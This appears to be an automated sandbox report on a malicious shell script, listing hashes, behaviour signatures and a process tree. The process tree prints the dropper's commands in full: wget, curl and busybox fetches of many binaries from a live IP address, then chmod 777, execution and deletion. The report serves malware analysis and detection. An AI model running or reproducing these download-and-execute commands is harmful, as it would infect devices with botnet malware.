Analysis
-
max time kernel
68s -
max time network
70s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:23
Static task
static1
Behavioral task
behavioral1
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
-
Size
10KB
-
MD5
6c8b51991fdf61d5e4d608d79172aadd
-
SHA1
10016e44064fd77256e054fe97e269bf6b46fc5e
-
SHA256
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335
-
SHA512
3db47a0dc66e9e868e1048b5fe9d76623218d7b22e383a0fe08a6aa839e389312ead6a4f05da171606cfb61b1898bede08be48c1fa45548d78071e0d95d8edb2
-
SSDEEP
192:QFJGhYwT11BGFV2uRjPe7jbP8lglFJGhYw91BGFV+jPe7jvee:4oTuYP8GvNN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:727
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:737
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:763
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:790
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:826
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:836
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:842
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:848
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:857
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:863
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:869
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:875
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:881
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:887
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:893
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:899
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:905
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:911
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:917
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:923
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:929
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:935
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:941
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:947
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:953
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:959
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:962
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:965
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:971
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:974
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97